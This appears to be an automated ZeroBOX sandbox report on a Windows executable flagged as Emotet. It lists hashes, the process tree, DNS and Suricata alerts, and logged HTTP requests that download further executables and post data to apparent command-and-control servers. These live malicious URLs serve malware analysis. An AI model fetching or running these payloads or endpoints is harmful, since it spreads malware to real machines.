Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Nov. 3, 2022, 9:51 a.m.	Nov. 3, 2022, 10:04 a.m.

Size	381.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`aa290cfe7546e91e88278a1c4b83440f`
SHA256	`f8904db64b83e85ee7ec0747230c18a8cd6d28a05e5784be796182fa4ea79b0d`
CRC32	`BB5F5180`
ssdeep	`6144:x/QiQXCtkm+ksmpk3U9j0IstOGBfj/WUplm6zIOYQNd28pTXdAmpCLVRZoglM7LT:pQi3tP6m6UR0IClL//plmW9bTXeVhDrE`
Yara	Win32_Trojan_Emotet_2_Zero - Win32 Trojan Emotet IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

Bolt.exe "C:\Users\test22\AppData\Local\Temp\Bolt.exe"
840
- Bolt.tmp "C:\Users\test22\AppData\Local\Temp\is-CGK7S.tmp\Bolt.tmp" /SL5="$30028,140559,56832,C:\Users\test22\AppData\Local\Temp\Bolt.exe"
  2060
  - PowerOff.exe "C:\Users\test22\AppData\Local\Temp\is-5Q4M8.tmp\PowerOff.exe" /S /UID=95
    2220
    - Rufifitajy.exe "C:\Users\test22\AppData\Local\Temp\3a-51b55-b43-4a28d-3a13d327ec8e4\Rufifitajy.exe"
      2840
    - Lyshusazhitae.exe "C:\Users\test22\AppData\Local\Temp\ed-e0dc9-70f-6739a-d042ac606a444\Lyshusazhitae.exe"
      2848
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        2156
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2156 CREDAT:145409
        1664
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
www.tattooyema.com	A 207.180.199.60	207.180.199.60
doll.s3.pl-waw.scw.cloud	A 151.115.10.1 CNAME s3.pl-waw.scw.cloud	151.115.10.1
apps.identrust.com	CNAME a1952.dscq.akamai.net A 23.43.165.105 CNAME identrust.edgesuite.net A 23.43.165.66 A 23.59.72.17 A 23.59.72.9	23.59.72.17
360devtracking.com	A 37.230.138.66	37.230.138.66
www.profitabletrustednetwork.com	A 173.233.137.36 A 173.233.139.164 A 192.243.61.227 A 192.243.61.225 A 173.233.137.60 A 192.243.59.12 A 192.243.59.20 A 192.243.59.13 A 173.233.137.52 A 173.233.137.44	173.233.137.36
www.google.com	A 142.251.42.164	142.250.76.132
connectini.net	A 37.230.138.123	37.230.138.123
wewewe.s3.eu-central-1.amazonaws.com	CNAME s3-r-w.eu-central-1.amazonaws.com A 52.219.75.64	52.219.140.44
google.com	A 142.251.42.142	142.250.206.206
e8ed9249-5033-4c8e-9aa2-82a1e867c268a.s3.pl-waw.scw.cloud	A 151.115.10.1 CNAME s3.pl-waw.scw.cloud	151.115.10.1
ert.eiwagggg.com	A 104.21.63.82 A 172.67.144.83	172.67.144.83

IP Address	Status	Action
142.251.42.142	Active	Moloch
142.251.42.164	Active	Moloch
151.115.10.1	Active	Moloch
164.124.101.2	Active	Moloch
173.233.137.44	Active	Moloch
23.43.165.66	Active	Moloch
23.59.72.17	Active	Moloch
37.230.138.123	Active	Moloch
37.230.138.66	Active	Moloch
52.219.75.64	Active	Moloch
95.214.24.96	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2027865	ET INFO Observed DNS Query to .cloud TLD	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 151.115.10.1:80	2027874	ET INFO HTTP Request to Suspicious *.cloud Domain	Potentially Bad Traffic
TCP 192.168.56.103:49169 -> 151.115.10.1:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49168 -> 52.219.75.64:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 151.115.10.1:80	2027874	ET INFO HTTP Request to Suspicious *.cloud Domain	Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 151.115.10.1:80	2027874	ET INFO HTTP Request to Suspicious *.cloud Domain	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 151.115.10.1:80	2027874	ET INFO HTTP Request to Suspicious *.cloud Domain	Potentially Bad Traffic
TCP 151.115.10.1:80 -> 192.168.56.103:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 151.115.10.1:80 -> 192.168.56.103:49170	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 151.115.10.1:80 -> 192.168.56.103:49170	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 151.115.10.1:80 -> 192.168.56.103:49171	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 151.115.10.1:80 -> 192.168.56.103:49171	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49181 -> 37.230.138.123:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49182 -> 142.251.42.164:80	2036303	ET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check	A Network Trojan was detected
UDP 192.168.56.103:64894 -> 164.124.101.2:53	2027865	ET INFO Observed DNS Query to .cloud TLD	Potentially Bad Traffic
UDP 192.168.56.103:56613 -> 164.124.101.2:53	2027865	ET INFO Observed DNS Query to .cloud TLD	Potentially Bad Traffic
TCP 192.168.56.103:49166 -> 37.230.138.123:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:53673 -> 164.124.101.2:53	2027865	ET INFO Observed DNS Query to .cloud TLD	Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 151.115.10.1:80	2027874	ET INFO HTTP Request to Suspicious *.cloud Domain	Potentially Bad Traffic
TCP 192.168.56.103:49189 -> 173.233.137.44:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 151.115.10.1:80 -> 192.168.56.103:49170	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49188 -> 173.233.137.44:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49183 -> 37.230.138.123:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49168 52.219.75.64:443	C=US, O=Amazon, OU=Server CA 1B, CN=Amazon	CN=*.s3.eu-central-1.amazonaws.com	bc:92:6b:62:48:5f:c5:08:60:03:a9:1e:bc:29:58:79:d7:4b:94:fb
TLS 1.2 192.168.56.103:49169 151.115.10.1:443	C=US, O=Let's Encrypt, CN=R3	CN=s3.pl-waw.scw.cloud	13:5a:26:76:9b:02:b0:88:8d:ed:ac:89:e9:f3:d1:bd:f4:6d:ff:fd
TLSv1 192.168.56.103:49181 37.230.138.123:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49
TLSv1 192.168.56.103:49166 37.230.138.123:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49
TLSv1 192.168.56.103:49189 173.233.137.44:443	C=US, O=Let's Encrypt, CN=R3	CN=profitabletrustednetwork.com	6a:48:45:b5:44:ae:75:f4:d2:b3:d4:5e:bc:2f:61:30:ec:d4:3a:99
TLSv1 192.168.56.103:49188 173.233.137.44:443	C=US, O=Let's Encrypt, CN=R3	CN=profitabletrustednetwork.com	6a:48:45:b5:44:ae:75:f4:d2:b3:d4:5e:bc:2f:61:30:ec:d4:3a:99
TLSv1 192.168.56.103:49183 37.230.138.123:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Nov. 3, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW Nov. 3, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 3, 2022, 9:51 a.m.			0	0
IsDebuggerPresent Nov. 3, 2022, 9:51 a.m.			0	0
IsDebuggerPresent Nov. 3, 2022, 9:51 a.m.			0	0
IsDebuggerPresent Nov. 3, 2022, 9:45 a.m.			0	0
IsDebuggerPresent Nov. 3, 2022, 9:45 a.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 3, 2022, 9:51 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Nov. 3, 2022, 9:52 a.m.	stacktrace: bolt+0x816a8 @ 0x4816a8 bolt+0x99c13 @ 0x499c13 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xeedface exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 1637924 registers.edi: 4523332 registers.eax: 1637924 registers.ebp: 1638004 registers.edx: 0 registers.ebx: 0 registers.esi: 2 registers.ecx: 7	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (15 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://e8ed9249-5033-4c8e-9aa2-82a1e867c268a.s3.pl-waw.scw.cloud/Sony/1715bb57-pub.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://e8ed9249-5033-4c8e-9aa2-82a1e867c268a.s3.pl-waw.scw.cloud/Sony/1715bb57-hand.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://e8ed9249-5033-4c8e-9aa2-82a1e867c268a.s3.pl-waw.scw.cloud/Sony/1715bb57-upda.exe
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.google.com/
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/SuperNitouDisc.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://doll.s3.pl-waw.scw.cloud/widgets/powerOff.exe
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/Conumer4Publisher.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/publisher/1/KR.json
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/Conumer2kenpachi.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/configPoduct/2/goodchannel.json
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_mp3studioWW
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_MyFileWW

Performs some HTTP requests (18 events)

request	HEAD http://e8ed9249-5033-4c8e-9aa2-82a1e867c268a.s3.pl-waw.scw.cloud/ATP-VW/power-5033-off.exe
request	GET http://e8ed9249-5033-4c8e-9aa2-82a1e867c268a.s3.pl-waw.scw.cloud/ATP-VW/power-5033-off.exe
request	GET http://e8ed9249-5033-4c8e-9aa2-82a1e867c268a.s3.pl-waw.scw.cloud/Sony/1715bb57-pub.exe
request	GET http://e8ed9249-5033-4c8e-9aa2-82a1e867c268a.s3.pl-waw.scw.cloud/Sony/1715bb57-hand.exe
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://e8ed9249-5033-4c8e-9aa2-82a1e867c268a.s3.pl-waw.scw.cloud/Sony/1715bb57-upda.exe
request	POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies
request	GET http://www.google.com/
request	POST https://connectini.net/Series/SuperNitouDisc.php
request	GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe
request	GET https://doll.s3.pl-waw.scw.cloud/widgets/powerOff.exe
request	POST https://connectini.net/Series/Conumer4Publisher.php
request	GET https://connectini.net/Series/publisher/1/KR.json
request	POST https://connectini.net/Series/Conumer2kenpachi.php
request	GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json
request	GET https://connectini.net/Series/configPoduct/2/goodchannel.json
request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_mp3studioWW
request	GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_MyFileWW

Sends data using the HTTP POST Method (4 events)

request	POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies
request	POST https://connectini.net/Series/SuperNitouDisc.php
request	POST https://connectini.net/Series/Conumer4Publisher.php
request	POST https://connectini.net/Series/Conumer2kenpachi.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 636 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 40960 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 20480 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000065a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000610000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3651000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ceb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002230000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000023f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3652000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3652000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3652000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3652000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3652000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3652000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3652000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3652000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3652000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3652000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3652000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3654000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3654000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3654000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3654000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93eca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93edc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ff0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ff1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ff2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ff3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ff4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fa6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ecb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ff5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ff6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 3, 2022, 9:51 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93edd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
